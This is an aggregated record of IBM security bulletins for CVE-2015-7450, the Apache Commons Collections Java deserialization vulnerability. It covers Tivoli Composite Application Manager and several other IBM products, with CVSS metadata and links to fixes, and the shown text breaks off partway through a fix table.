Security Bulletin: Vulnerability in Apache Commons affects IBM Tivoli Composite Application Manager Agent for WebSphere Applications (CVE-2015-7450)

2018-06-17T15:13:52

Description

## Summary An Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Tivoli Composite Application Manager Agent for WebSphere Applications. ## Vulnerability Details **CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) **DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. CVSS Base Score: 9.8 CVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score CVSS Environmental Score*: Undefined CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) ## Affected Products and Versions IBM Tivoli Composite Application Manager Agent for WebSphere Applications 7.1.0.3.x and 7.2.0.0.x ## Workarounds and Mitigations The affected Apache commons-collections-3.2.jar is in the IBM Tivoli Composite Application Manager Agent for WebSphere Applications image. The instruction of replacing commons-collections-3.2.jar with commons-collections-3.2.2.jar can be found at <http://www.ibm.com/support/docview.wss?uid=swg21972189> ##

Affected Software

CPE Name	Name	Version
	tivoli composite application manager for websphere	7.2

{"id": "39AF54005626237D817FF2842935E6FEC2A49CAF5B21F866EA5B32CC019CCEE3", "vendorId": null, "type": "ibm", "bulletinFamily": "software", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Tivoli Composite Application Manager Agent for WebSphere Applications (CVE-2015-7450)", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Tivoli Composite Application Manager Agent for WebSphere Applications.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Tivoli Composite Application Manager Agent for WebSphere Applications 7.1.0.3.x and 7.2.0.0.x\n\n## Workarounds and Mitigations\n\nThe affected Apache commons-collections-3.2.jar is in the IBM Tivoli Composite Application Manager Agent for WebSphere Applications image. The instruction of replacing commons-collections-3.2.jar with commons-collections-3.2.2.jar can be found at <http://www.ibm.com/support/docview.wss?uid=swg21972189>\n\n## ", "published": "2018-06-17T15:13:52", "modified": "2018-06-17T15:13:52", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.ibm.com/support/pages/node/273587", "reporter": "IBM", "references": [], "cvelist": ["CVE-2015-7450"], "immutableFields": [], "lastseen": "2023-02-21T01:46:56", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:BC293A26-1A78-4F0D-B4CE-04E218BA7440"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2015-1337"]}, {"type": "cisa", "idList": ["CISA:99DAB57F9B8063F8619B1A418B014DF1"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2015-7450"]}, {"type": "cve", "idList": ["CVE-2015-7450"]}, {"type": "ibm", "idList": ["0629AF41906DD26A46F9FEDBC0E3DEA130B830A45C43613EEC32A92E38CD9329", "06457DA2FE08EC56407EF05C2EAAA9080634D44807C2A8ABBDEA18DCD9364BAC", "0CE9B36358C9687E7112577EA1304074A68EA6DD5359A3F6615F7BA94A6B8E7D", "104BE807C8577FF816DF414B5A588FABB581711BB54758F6F49C7CAC17CD68BE", "13C3D53BA54035028BA8B6CCC92D57C0C0AFB5754F2A746073C2E64512AF302A", "14D6BD9FB21D986F7A7372B530E1023CD0FF42323E4743E166603718FA4482AC", "16851167A6E7D383CF52D5B447DED7E09886CA93B8A9A92A25FD7998659A49D8", "1696E1D8792540E46785AF5C86F8AD0F77D5F716A56F15223E99344280FB380A", "182B7E2B619361F12F4ED5FC874487EFED77E355247E741885559BD37BCBA877", "19926537DC891C5AD7A729E9A8684B4D6D6593A474667DC8BF2B3DA57D44FCF9", "2AA98F262EB695D2458A3ED4EC4F0E7090EB4CE4B2F0F815EF828CF974F2C44B", "2AD55644A16B08DC4CD7D5B0074C944128455FA5FB38A6CCCF95596E90E15198", "305CFF54D1B74278AA889780BABE7E0790314E9D321B6262C0EA59170C7721E6", "3484930B9D1D577B443F9B6823E8F4CFC7578B80B89E16866C07AC9046A0F330", "38EA893B1CB49114E3D8196A772DD2EACB1D68746AC3215F7DC912F30D4B3635", "3EF919878669EE41DD08409B9AA0E2DAA0F0DBC40CFE18712D5924A93F1806CF", "3FDC0101985ADD7D5774F255D78C573813EE11684088944BAF72283AB319514E", "41A2B080355DFAE7EADFECB4D5D6C7105784D83B969140D731128E3E9EDA0757", "4429AE393D14D9DD1BA1A49D42CB67BB5D731909307AF189B937C047DFFB1943", "5518E42719E2CDA44942EEB207D99CA80651C3C9A128414CB23DFF383B97AF66", "5AC842C76A38BA7E6961E8ACD0BA85FA50688DCA05B04D73F870154778C0B550", "5E2AFDF7AB3E087F15E11D8D08AEEF34592E638BA469F3697192CBD365B9C998", "5FDFAE3378B94695C361E1304FEE4C2C4F92EC0924C89C3F18E53B852DEDD45C", "63DAED287E5E589CB66DEE42D6AD62CBADA57BF5A22C757E4A6252674CC1D266", "65DB2DF1E5DFCD77CCBBB618503600B226ECB723619232D76182A80D58890F9D", "689070AB4C011A979BBA5848242A400944D849D04225B611EB1D2B6DEFE03427", "6C099EB2D7A6A7FB08F677C5022E99A80942C8B6F6F4DD59D6C967A34499E8CB", "6E142852D8578EFF0FFB850451F8784B6C1F52CF6277D449EF09B2E7015902D3", "7046138B9599A1C4F494C484A9BB676F47CE5DB50FD7EC9400CB6F191317A8B0", "705280D237DEDB26D3D68396BC2097819ADC8127D93D08AF8CFC027E9A703179", "709E27E3685930B945F2FBC357A30EA55914B7F6AA51DED371226AB763C07085", "7196C8D1335ADFCDC76659DB37704C37F43BFC5EAAC5070B6B965CB49E2ED826", "75FBC99F16C88B1504B48FA2439543EF4EB7781607D6FBD77B50EA9DDDB94345", "76A7E7DAF9C149B8FD66E19139F6112A525F103DF32693A1F4D43F31321E1A1E", "77E4E1DA195A2142CE6FAE8E0103BFF102ED3CC6A7AF12809B16F51B400704FC", "789948D6E2D3214CF6D14873F1BE91C91BC7007F1ACE3F9DD9D9CBFBB98592A9", "7996A5B21090888A5E92985E9AA52C1DFFD5B468A73A1B32557A0A11DFBE0724", "7A9325A3A31DA6075D430BD9972B87037EACC19F9E8A6BECE8F05FDEEF567CEB", "7ADA99C6F6CBC1C4CB732F884DB11AD6B5BB2132DE3162727948C9DEE857DEB3", "7AE79CBB38C9B30F603A5F44A9B8F142162D6B14888148AC3503AD993B81C776", "7B3AC56328D3147E79BEC5737ADB41C519A985674FD8C6C608CC27164A464E84", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E1AD56C932EE6022D560B647F3D701B90E917C8D245F2619F30EAFAE93014A2", "824E537DD314DA72866A8405781D328166B8D8F77550C925EC957FB68C2CB1CA", "8287275EEC72C6CC4E80477CA04131224FEE84C5F897F0E0579443793E0C38AF", "84ADA1A0F9193EF446D20A2AE6CBA8AD78BD934525DE84341357005D9E20113E", "86049AD5B728A475ACFB48AEFA39FBAE662CCDAA8014795312D69A9E860527D2", "865491A8AE45D8889B4A4B68C631AF51173BD6FAC1388EA03C0A94F22F2C9462", "8A9198697F8388FC75E2DA73A2811AC8903D8787718F479A630B9674D8C0DC03", "8B09C9492941B8B6C6FB844862484437C6E439C77EC2B6E2EA1BC5C87B890DBB", "907D422E64306B77CE4FC8F237994BB7A9BE500E8F53773E33B3C6A72CB4F50D", "9A0B377B539E9EB3DEAE72601B316AC39529FEB48D77BA9C2660AD88E7DF662B", "9AE27752CE61B7806165EEC477048C9431337F2A610460AB42D12020D03EF964", "9E20D1855575208AB10D7A37A8F732F5FB0995B4D096646EBC735EE1706B18C6", "9E3FCEB3C8DC76AD3152DBCC2EFEFAB5F229FFCEF4CF1D756D45190726CF3D0D", "A6B089124F750729C2A5DCFDD551701AB74968E1A86A4C4BE83273F5F8E1BE38", "AC33843924B6A7415E2B5520B228A4C48ECE79D3ED971F29EAFD5A574C45E7BF", "AC54A5DAFA15D91044EA9FE6159829752BCD0E35D53719860B2A80D7AB2DBBA9", "B0549540072FC1BB0D803052330E32E656605B46C7EDC1BE259FE2273831E00B", "B0A606101370774E5FB3E4409A17D910B4B5997971AC7B7045727379D355B696", "B45ABED8BD58C33A07263A55AF5D4FCACA1D1D4D41B9076C9B3E26F4C663C536", "B61AB1D0CA790E1ACAC9798122DF79FFCF9B8B2580CDC33E702C953B7EF6B140", "B634FF2E7FC1F3330432FBCA9743C474852276C64003951811F2A870EB1D6D85", "B9410A108CEB6D3C9DFE0C1617FB34D181E021D243C3FB7F5DB35969D7C4CE52", "BBC19469EB9B90D82D15BF345DE6BD2F2984CAE6A5427AAEAFBF0699FD85D085", "C03FA5EBB009D6B1F8AADC24B78B9ABD8ADACBA78E030EBADE0D37E5B4B8531B", "C08849A00434A559EE1C5504DAE1CDDB28E9D46EDC400E95B2136AC317DFE7A3", "C2589DFBD09C40CB0ED3C14A127AD44309E3A47D40C1ABCBAA157F4307C403C7", "C4201BA18FD219F4998B9CD1F31247B019E4B70DABFE54578652DCDBE9377D5D", "C55D668E9DAA959DD19BE97127802F50A829DCC234E975F8050767FE8AEFE217", "C5DC7E3B34A4B9A3DC0E8C0FAFE2DA531B9CD3D402160B1BD2722664BB8814ED", "CD6036E42997395942F7FF83895D94F94E8BFD2DC6168C160F484DA20BCCF217", "D25FC5FB8A8B1C59AB072CD2FAFBE0E65B654246DF1F523B2F0760F380BBA57D", "D2E48469AB3A6F2B1FEAEFDF00F68B8BC2F210C7E3BBABA5556DFDE4C6DB7ECD", "D5DD24C882DBB1D9A7CA1FF6A2B5E71A2110BD5524772EF5C4D134F94002AC84", "D66F1CF05D4FAEAA1D2A1BD6C942DFBCEFA7698121E07EA674D81BA77E984AF6", "D6EF0A354BC60FD9763CCD91736DAA8B1445C437C0A7B30389216581A9447D9D", "D71ECE9054A0423D2796261CBA40257762AA9E2D7719136781F2B173EA9107E9", "D807F98F285E9AA24C6982ECD7ECE986CC9DAEE3771B85EB11104E7DB3A38BAE", "D9F9C21739CE0374485FD9F451E99B1E3D3DD763F365282CE7DBE1FD581588A1", "DB2B818A328E9D978E389CD017B47DF75CF8C64900E023A2B46B5D029C47E02F", "DF1E63CF8B14528F156628BE21730C46B9AD6FEBFA9BE46C21DFFEFE8A0D3852", "E3BAE9A30B20D04512C7C16881BAE14D80726FD5F24F3B32C3DF1C51B000477A", "E432DAD10EFE3753090EF63CF4FCD4A0EC759F3B4E8CBBF27B3179085A515230", "E54048B186E2B0430A492A11B734CD6DBAB437E3800A622970DF288484B9F9CA", "E9094C448DDFA53F1801F49370E9B1301873155775CFD8E4A6A53500E27FBB43", "ECDAD91B40717D302E53EC250B57F9219834CC0086D59A26ACB8BC5B0D731D7A", "EE24AB0B2E014F082958A51E75EF50D8A2A13DBA178F55CE89E4F1B70E8B8524", "F665A1245FF1694ED9B578D35C955B51DAA051F90350DA793AFAC0D05F2DCC0B", "F6932FFA729B316CDBF1B06D2938B9D53FBCB3E73735DBB2B0ECB271EC493B76", "F9ADD5C0B29D5EA4036B7F3A5477FA4502428CD7F7F7ABD1AF85EE16C6650D8F", "FCF66C1A96FDC8625BB9D927E042CEAA982B68F998C9AFCE8CBB28E803F9F816"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784367"]}, {"type": "nessus", "idList": ["WEBSPHERE_JAVA_SERIALIZE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105835", "OPENVAS:1361412562310806624"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141631"]}, {"type": "saint", "idList": ["SAINT:2A4358BF31AF1DF12CC0825DE2A0B1D2", "SAINT:66FBA7CC8FD20610677EE0D63C3A16A6", "SAINT:9C099C4B9A40BE916B04858EBBBB06B1", "SAINT:C049B327B327D8889E6EDEE0F0EFB1CB"]}, {"type": "thn", "idList": ["THN:F73D624126468D834271728F43F4B725"]}, {"type": "threatpost", "idList": ["THREATPOST:9041B76CCCD278242DD81A2F7BFCE45E"]}, {"type": "zdt", "idList": ["1337DAY-ID-27317"]}]}, "score": {"value": 1.7, "vector": "NONE"}, "affected_software": {"major_version": [{"name": "tivoli composite application manager for websphere", "version": 7}]}, "epss": [{"cve": "CVE-2015-7450", "epss": "0.974190000", "percentile": "0.998590000", "modified": "2023-03-20"}], "vulnersScore": 1.7}, "_state": {"dependencies": 1676944113, "score": 1684017862, "affected_software_major_version": 1677394894, "epss": 1679361349}, "_internal": {"score_hash": "3fc0f4a94a1cb009047d46ce53515f4c"}, "affectedSoftware": [{"version": "7.2", "operator": "eq", "name": "tivoli composite application manager for websphere"}]}

{"ibm": [{"lastseen": "2023-02-21T01:38:38", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed in the Global Cache component of WebSphere Message Broker and IBM Integration Bus\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Integration Bus V9 , V10 \n\nWebSphere Message Broker V8\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **APAR**| **Remediation/Fix** \n---|---|---|--- \nIBM Integration Bus \n \n \n| V10.0.0.2 and higher \n \n| IT12315 | An interim fix is available from IBM Fix Central. \n[http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/Integration+Bus&release=All&platform=All&function=aparId&apars= IT12315](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/Integration+Bus&release=All&platform=All&function=aparId&apars=%20IT12315>) \n \nThe APAR is targeted to be available in fix pack 10.0.0.4 \nIBM Integration Bus \n \n \n| V10.0.0.1 and lower \n \n| IT12306 | An interim fix is available from IBM Fix Central. \n[http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/Integration+Bus&release=All&platform=All&function=aparId&apars= IT12306](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/Integration+Bus&release=All&platform=All&function=aparId&apars=%20IT12306>) \nIBM Integration Bus \n \n \n| V9 \n \n| IT12306 | An interim fix is available from IBM Fix Central. \n[http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/Integration+Bus&release=All&platform=All&function=aparId&apars= IT12306](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/Integration+Bus&release=All&platform=All&function=aparId&apars=%20IT12306>) \n \nThe APAR is targeted to be available in fix pack 9.0.0.5 \nWebSphere Message Broker \n \n| V8 \n| IT12306 | An interim fix is available from IBM Fix Central. \n[http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Message+Broker&release=All&platform=All&function=aparId&apars=IT12306](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Message+Broker&release=All&platform=All&function=aparId&apars=IT12306>) \nThe APAR is targeted to be available in fix pack 8.0.0.7 \n \n_For unsupported versions of the product, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n \nThe planned maintenance release dates for WebSphere Message Broker and IBM Integration Bus are available at : \n[http://www.ibm.com/support/docview.wss?uid=swg27006308 ](<http://www.ibm.com/support/docview.wss?uid=swg27006308>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-23T20:41:52", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects WebSphere Message Broker and IBM Integration Bus (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2020-03-23T20:41:52", "id": "ECDAD91B40717D302E53EC250B57F9219834CC0086D59A26ACB8BC5B0D731D7A", "href": "https://www.ibm.com/support/pages/node/273819", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:46", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Cognos Controller.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Controller 10.2.1 \n\nIBM Cognos Controller 10.2\n\nIBM Cognos Controller 10.1.1\n\nIBM Cognos Controller 10.1\n\nIBM Cognos Controller 8.5.1\n\nIBM Cognos Controller 8.5\n\n## Remediation/Fixes\n\n[IBM Cognos Controller 10.2.1 FP2 IF2](<http://www-01.ibm.com/support/docview.wss?uid=swg24041392>)\n\n[IBM Cognos Controller 10.2 FP1 IF4](<http://www-01.ibm.com/support/docview.wss?uid=swg24041391>)\n\n[IBM Cognos Controller 10.1.1 FP3 IF4](<http://www-01.ibm.com/support/docview.wss?uid=swg24041390>)\n\n[IBM Cognos Controller 10.1 IF6](<http://www-01.ibm.com/support/docview.wss?uid=swg24041389>)\n\n[IBM Cognos Controller 8.5.1 FP1 IF3](<http://www-01.ibm.com/support/docview.wss?uid=swg24041388>)\n\n \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\nUsers of IBM Cognos Controller 8.5 are advised to contact IBM Customer Support.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T22:41:05", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Cognos Controller (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T22:41:05", "id": "9A0B377B539E9EB3DEAE72601B316AC39529FEB48D77BA9C2660AD88E7DF662B", "href": "https://www.ibm.com/support/pages/node/272327", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:38:07", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Rational Developer for System z\n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support alerts like this.**\n\n * Follow [this link](<https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo>) for more information (requires login with your IBM ID) \n---|--- \n \n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n--- \n \n## Affected Products and Versions\n\n**Principal Product and Version(s)** \n \n--- \n \n * Rational Developer for System z, versions 9.1.1.2 and earlier\n * Rational Developer for z Systems, version 9.5 \n \n## Remediation/Fixes\n\nIBM has provided patches for all affected versions. \n \nFollow the installation instructions in the README files included with the patch. \n \nThe fix can be obtained at the following locations: \n \n\n\nRational Developer for System z| \n\n9.1.1.2\n\n| [Rational Developer for System z Interim Fix 1 for 9.1.1.2](<http://www-01.ibm.com/support/docview.wss?uid=swg24041307>) \n---|---|--- \nRational Developer for z Systems| \n\n9.5\n\n| [Rational Developer for z Systems Interim Fix 1 for 9.5](<http://www-01.ibm.com/support/docview.wss?uid=swg24041308>) \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-27T15:56:50", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Rational Developer for System z (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2020-10-27T15:56:50", "id": "AC33843924B6A7415E2B5520B228A4C48ECE79D3ED971F29EAFD5A574C45E7BF", "href": "https://www.ibm.com/support/pages/node/272769", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:38:09", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Rational Software Architect, Rational Software Architect for WebSphere Software and Rational Software Architect RealTime.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nRational Software Architect, Rational Software Architect for WebSphere Software and Rational Software Architect RealTime: Ver 8.5 through 9.5\n\n## Remediation/Fixes\n\n_Product_\n\n| \n\n_VRMF_ | \n\n_Remediation/First Fix_ \n---|---|--- \nRational Software Architect (RSA)| 9.5| [_Rational-RSA95-CVE-2015-7450-ifix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect&release=9.5.0&platform=All&function=fixId&fixids=Rational-RSA95-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect (RSA)| 9.1.x| [_Rational-RSA91-CVE-2015-7450-ifix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect&release=9.1.0&platform=All&function=fixId&fixids=Rational-RSA91-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect (RSA)| 9.0.x| [_Rational-RSA90-CVE-2015-7450-ifix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect&release=9.0.0&platform=All&function=fixId&fixids=Rational-RSA90-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect (RSA)| 8.5.x| [_Rational-RSA85-CVE-2015-7450-ifix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect&release=8.5.0&platform=All&function=fixId&fixids=Rational-RSA85-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect for WebSphere Software (RSA4WS)| 9.5| [_Rational-RSA4WS95-CVE-2015-7450-ifix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect+for+WebSphere+Software&release=9.5.0&platform=All&function=fixId&fixids=Rational-RSA4WS95-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect for WebSphere Software (RSA4WS)| 9.1.x| [_Rational-RSA4WS91-CVE-2015-7450-ifix_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7ERational&product=ibm/Rational/Rational+Software+Architect+for+WebSphere+Software&release=9.1.0&platform=All&function=fixId&fixids=Rational-RSA4WS91-CVE-2015-7450-ifix&includeSupersedes=0&source=fc>) \nRational Software Architect for WebSphere Software (RSA4WS)| 9.0.x| 